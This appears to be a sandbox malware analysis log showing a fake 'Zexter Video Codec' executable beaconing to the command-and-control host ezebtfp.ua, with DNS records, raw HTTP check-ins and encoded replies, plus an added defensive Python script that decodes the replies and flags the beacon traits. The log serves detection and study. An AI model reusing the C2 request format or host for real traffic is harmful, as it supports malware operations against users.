                                                                                                    Oct 3, 2024 08:41:03.724756002 CEST4977980192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:03.730065107 CEST8049779185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:04.426274061 CEST8049779185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:04.426341057 CEST4977980192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:04.546231031 CEST4977980192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:04.546617031 CEST4978080192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:04.562465906 CEST8049780185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:04.562596083 CEST4978080192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:04.562705040 CEST8049779185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:04.562783003 CEST4978080192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:04.562844038 CEST4977980192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:04.583483934 CEST8049780185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:05.350626945 CEST8049780185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:05.350713015 CEST4978080192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:05.469022036 CEST4978080192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:05.469666004 CEST4978180192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:05.678822994 CEST8049781185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:05.678913116 CEST4978180192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:05.678982973 CEST8049780185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:05.679094076 CEST4978080192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:05.683391094 CEST4978180192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:05.688621998 CEST8049781185.208.158.248192.168.2.5
Oct 3, 2024 08:41:07.092375040 CEST | 80 | 49781 | 185.208.158.248 | 192.168.2.5
Oct 3, 2024 08:41:07.092387915 CEST | 80 | 49781 | 185.208.158.248 | 192.168.2.5
Oct 3, 2024 08:41:07.092510939 CEST | 49781 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:41:07.094438076 CEST | 80 | 49781 | 185.208.158.248 | 192.168.2.5
Oct 3, 2024 08:41:07.094526052 CEST | 49781 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:41:07.202946901 CEST | 49782 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:41:07.202946901 CEST | 49781 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:41:07.214256048 CEST | 80 | 49782 | 185.208.158.248 | 192.168.2.5
Oct 3, 2024 08:41:07.215253115 CEST | 80 | 49781 | 185.208.158.248 | 192.168.2.5
Oct 3, 2024 08:41:07.215375900 CEST | 49782 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:41:07.215375900 CEST | 49781 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:41:07.215607882 CEST | 49782 | 80 | 192.168.2.5 | 185.208.158.248
Oct 3, 2024 08:41:07.221390009 CEST | 80 | 49782 | 185.208.158.248 | 192.168.2.5
Oct 3, 2024 08:41:07.965732098 CEST | 80 | 49782 | 185.208.158.248 | 192.168.2.5
Oct 3, 2024 08:41:07.965780020 CEST | 49782 | 80 | 192.168.2.5 | 185.208.158.248
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 3, 2024 08:39:57.002897978 CEST | 58836 | 53 | 192.168.2.5 | 141.98.234.31
Oct 3, 2024 08:39:57.241374016 CEST | 53 | 58836 | 141.98.234.31 | 192.168.2.5
Oct 3, 2024 08:40:50.386327982 CEST | 56127 | 53 | 192.168.2.5 | 1.1.1.1
Oct 3, 2024 08:40:56.907285929 CEST | 53259 | 53 | 192.168.2.5 | 1.1.1.1
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 3, 2024 08:39:57.002897978 CEST | 192.168.2.5 | 141.98.234.31 | 0xade3 | Standard query (0) | ezebtfp.ua | A (IP address) | IN (0x0001) | false
Oct 3, 2024 08:40:50.386327982 CEST | 192.168.2.5 | 1.1.1.1 | 0xc44d | Standard query (0) | signup.live.com | A (IP address) | IN (0x0001) | false
Oct 3, 2024 08:40:56.907285929 CEST | 192.168.2.5 | 1.1.1.1 | 0x940c | Standard query (0) | signup.live.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 3, 2024 08:39:57.241374016 CEST | 141.98.234.31 | 192.168.2.5 | 0xade3 | No error (0) | ezebtfp.ua | | 185.208.158.248 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 08:40:50.393599033 CEST | 1.1.1.1 | 192.168.2.5 | 0xc44d | No error (0) | signup.live.com | account.msa.msidentity.com | | CNAME (Canonical name) | IN (0x0001) | false
Oct 3, 2024 08:40:56.914307117 CEST | 1.1.1.1 | 192.168.2.5 | 0x940c | No error (0) | signup.live.com | account.msa.msidentity.com | | CNAME (Canonical name) | IN (0x0001) | false
                                                                                                    • ezebtfp.ua
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49711 | 185.208.158.248 | 80 | 1216 | C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 08:39:57.304194927 CEST | 313 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396087fc16c6ef91 HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:39:57.996258020 CEST | 220 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:39:57 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20
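The session 0 exchange above, together with the DNS tables before it, can be checked mechanically. The Python below is an added example written for this page; it is not code from the Joe Sandbox report, from the sample, or from any Joe Sandbox API. It embeds, as constructed sample input copied from the rows above, the session 0 request line with its two headers, the "Data Raw" bytes of the 220-byte response, and the three DNS query rows. It decodes the chunked response body to the 14-byte token the server actually returned (the "Data Ascii" column shows chunk framing and payload run together: `e` is the chunk size, `0` the terminator), flags the traits of this check-in that a detection would key on (a long lowercase-hex blob in `/search/?q=`, a User-Agent claiming "Windows NT 9.0", a version that never shipped, and "MSIE" without the "compatible;" token every real Internet Explorer UA carries), and lists the lookup that went to 141.98.234.31 while the other two queries used 1.1.1.1. The tag names, the `REAL_NT_VERSIONS` list and the 1.1.1.1 "expected resolver" default are the example's own assumptions, not something the report states.

```python
"""Triage helpers for the HTTP and DNS rows in this report.

Added example for this page; not code from the Joe Sandbox report, from the
sample, or from any Joe Sandbox API. Sample inputs are copied from the table
rows above and embedded here so the module runs offline.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Session 0 request: request line plus the two headers the report shows.
SAMPLE_REQUEST = (
    "GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed"
    "82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c445db22f31df92d88"
    "38ed12a666d307eca743ec4c2b07b5296692396087fc16c6ef91 HTTP/1.1\r\n"
    "Host: ezebtfp.ua\r\n"
    "User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)\r\n"
)

# "Data Raw" of the 220-byte response in session 0: a chunked HTTP/1.1 body,
# hex-encoded by the sandbox with one space between bytes.
SAMPLE_DATA_RAW = "65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a"

# The three rows of the DNS query table: (timestamp, source IP, dest IP, name).
SAMPLE_DNS_QUERIES = [
    ("08:39:57.002897978", "192.168.2.5", "141.98.234.31", "ezebtfp.ua"),
    ("08:40:50.386327982", "192.168.2.5", "1.1.1.1", "signup.live.com"),
    ("08:40:56.907285929", "192.168.2.5", "1.1.1.1", "signup.live.com"),
]

# Windows NT versions a genuine browser can report (assumed list). "Windows NT
# 9.0" is not among them: 8.1 is NT 6.3, Windows 10 and 11 are NT 10.0.
REAL_NT_VERSIONS = {"4.0", "5.0", "5.1", "5.2", "6.0", "6.1", "6.2", "6.3", "10.0"}
HEX_BLOB = re.compile(r"^[0-9a-f]{64,}$")


def dechunk(data_raw_hex: str) -> bytes:
    """Decode a hex-dumped chunked body into the payload the C2 actually sent."""
    buf = bytes.fromhex(data_raw_hex)
    payload = bytearray()
    pos = 0
    while True:
        eol = buf.index(b"\r\n", pos)
        # The size line is hex and may carry ";extension" parameters.
        size = int(buf[pos:eol].split(b";")[0], 16)
        pos = eol + 2
        if size == 0:          # last-chunk marker; trailers/final CRLF follow
            break
        payload += buf[pos:pos + size]
        pos += size + 2        # skip chunk data and its trailing CRLF
    return bytes(payload)


def beacon_indicators(request: str) -> set:
    """Return the traits of this family's check-in that a request exhibits."""
    lines = request.split("\r\n")
    _method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()

    tags = set()
    parts = urlsplit(target)
    q = parse_qs(parts.query).get("q", [""])[0]
    if parts.path == "/search/" and HEX_BLOB.match(q):
        tags.add("hex_blob_in_search_q")

    ua = headers.get("user-agent", "")
    nt = re.search(r"Windows NT (\d+\.\d+)", ua)
    if nt and nt.group(1) not in REAL_NT_VERSIONS:
        tags.add("impossible_nt_version")
    # Every real Internet Explorer UA reads "Mozilla/x.0 (compatible; MSIE ...".
    if "MSIE" in ua and "compatible;" not in ua:
        tags.add("msie_without_compatible")
    return tags


def off_resolver_queries(rows, expected_resolver="1.1.1.1"):
    """Lookups sent to a DNS server other than the one the host normally uses.

    1.1.1.1 is taken from the other two queries in the report (an assumption);
    in production substitute the organisation's resolvers. A mismatch is worth
    an alert on its own because it bypasses resolver-side logging and filtering.
    """
    return [(name, dst) for _ts, _src, dst, name in rows if dst != expected_resolver]


if __name__ == "__main__":
    print("C2 reply payload:", dechunk(SAMPLE_DATA_RAW).decode())
    print("beacon indicators:", sorted(beacon_indicators(SAMPLE_REQUEST)))
    print("off-resolver lookups:", off_resolver_queries(SAMPLE_DNS_QUERIES))
```

Run it directly to see the three results for the session 0 data; pointing `beacon_indicators` at a proxy log and `off_resolver_queries` at DNS telemetry turns the same checks into detections. The UA check is the cheapest of the three to deploy, since a Windows NT version that does not exist needs no knowledge of the family at all.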


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49712 | 185.208.158.248 | 80 | 1216 | C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 08:39:58.200680017 CEST | 313 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396087fc16c6ef91 HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:39:58.879477024 CEST | 810 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:39:58 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 32 35 61 0d 0a 36 37 62 36 38 61 38 61 33 32 30 33 61 37 37 62 30 34 31 38 66 35 35 66 36 37 37 63 38 31 63 34 35 39 66 65 38 62 64 32 65 39 31 66 31 65 66 35 61 32 35 63 65 39 31 35 38 35 62 63 63 66 62 35 66 62 63 34 30 61 64 39 30 38 38 62 65 38 64 65 32 32 36 36 65 32 30 38 61 36 62 62 39 64 35 39 32 64 65 30 37 35 34 36 61 62 37 36 65 38 36 36 61 38 33 32 34 62 63 31 66 62 64 30 30 32 63 31 34 33 63 64 37 64 62 62 31 33 66 65 32 64 38 62 32 35 65 35 30 65 61 34 36 36 63 30 34 64 62 61 65 62 34 36 65 37 35 38 37 66 34 33 65 63 32 66 36 36 39 31 33 64 37 39 38 62 66 36 30 66 63 32 65 63 39 36 38 34 33 61 63 64 36 63 39 63 31 37 64 38 35 30 38 66 32 31 62 32 35 63 61 64 65 65 35 39 33 66 65 62 37 63 63 63 66 66 37 61 62 31 38 35 65 63 64 35 34 61 65 36 33 35 63 38 31 31 33 34 34 33 35 38 32 34 65 34 33 62 37 30 30 62 36 35 61 37 65 65 38 66 66 62 38 63 32 63 35 31 65 36 35 63 37 30 32 39 66 63 33 34 35 66 66 37 66 65 66 39 38 64 66 63 33 66 36 35 61 35 65 39 34 32 39 38 38 31 66 62 37 61 32 37 31 [TRUNCATED]
                                                                                                    Data Ascii: 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
Oct 3, 2024 08:40:01.512636900 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:40:01.788605928 CEST | 220 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:01 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49715 | 185.208.158.248 | 80 | 1216 | C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 08:40:01.909507036 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:40:02.619884014 CEST | 666 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:02 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 31 63 61 0d 0a 36 37 62 36 39 63 39 35 33 38 30 34 62 32 36 62 35 36 35 66 65 39 35 62 33 32 31 62 64 31 39 61 35 35 66 37 38 63 64 32 65 64 31 63 30 31 65 61 61 32 35 35 66 34 30 32 64 31 66 61 38 31 65 63 39 34 38 37 34 64 38 62 34 66 64 32 66 62 64 66 33 37 33 36 62 39 34 65 66 65 64 31 64 61 31 38 32 38 65 31 37 64 35 61 61 64 37 35 66 36 36 63 61 38 33 37 35 33 64 65 66 62 64 61 31 36 63 32 34 30 63 65 36 33 62 31 31 30 66 63 33 39 38 62 32 36 65 34 31 30 61 64 36 32 63 30 34 64 62 63 65 35 35 30 65 62 35 64 36 31 34 31 65 66 32 63 36 64 39 36 33 62 36 37 38 65 66 34 31 30 63 37 65 65 38 62 39 38 33 66 63 61 37 31 39 34 31 35 64 62 34 65 38 64 32 38 62 33 35 33 62 32 65 39 35 66 32 31 65 36 37 33 64 30 65 33 37 62 62 39 38 64 66 31 64 34 34 63 65 37 32 30 63 38 31 32 33 30 35 37 35 66 32 30 65 33 32 35 37 39 30 39 36 31 62 31 66 32 38 66 66 65 39 38 32 39 35 31 66 38 35 64 37 62 32 39 66 34 32 66 35 64 66 37 66 37 65 65 38 38 65 34 33 66 37 65 61 63 66 33 34 35 39 36 38 32 65 35 37 62 32 30 31 [TRUNCATED]
                                                                                                    Data Ascii: 1ca67b69c953804b26b565fe95b321bd19a55f78cd2ed1c01eaa255f402d1fa81ec94874d8b4fd2fbdf3736b94efed1da1828e17d5aad75f66ca83753defbda16c240ce63b110fc398b26e410ad62c04dbce550eb5d6141ef2c6d963b678ef410c7ee8b983fca719415db4e8d28b353b2e95f21e673d0e37bb98df1d44ce720c81230575f20e325790961b1f28ffe982951f85d7b29f42f5df7f7ee88e43f7eacf3459682e57b201bb76def98c0b164cf69042c2f65a950d0deac3328bac90eb303b8bc30b9c1d531712d10d132ed19edd1be0744d33716da54dff27d9b2ea99f54a1e2d0a8f00
Oct 3, 2024 08:40:02.730813026 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:40:03.096632004 CEST | 220 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:03 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49717 | 185.208.158.248 | 80 | 1216 | C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 08:40:03.222007036 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:40:03.912508011 CEST | 220 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:03 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49718 | 185.208.158.248 | 80 | 1216 | C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 08:40:04.148631096 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:40:04.832319975 CEST | 220 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:04 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49719 | 185.208.158.248 | 80 | 1216 | C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 08:40:04.955013037 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:40:05.669584036 CEST | 220 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:05 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20
Oct 3, 2024 08:40:05.777793884 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:40:06.018551111 CEST | 220 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:05 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49720 | 185.208.158.248 | 80 | 1216 | C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 08:40:06.142477989 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:40:06.831357956 CEST | 220 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:06 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49721 | 185.208.158.248 | 80 | 1216 | C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 08:40:06.966164112 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Oct 3, 2024 08:40:08.481785059 CEST | 220 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:07 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20
Oct 3, 2024 08:40:08.484606028 CEST | 220 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:07 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20
Oct 3, 2024 08:40:08.486325979 CEST | 220 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:07 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20
                                                                                                    Oct 3, 2024 08:40:08.590416908 CEST | 321 | OUT | GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:08.830358028 CEST | 220 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:08 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    8 | 192.168.2.5 | 49722 | 185.208.158.248 | 80 | 1216 | C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
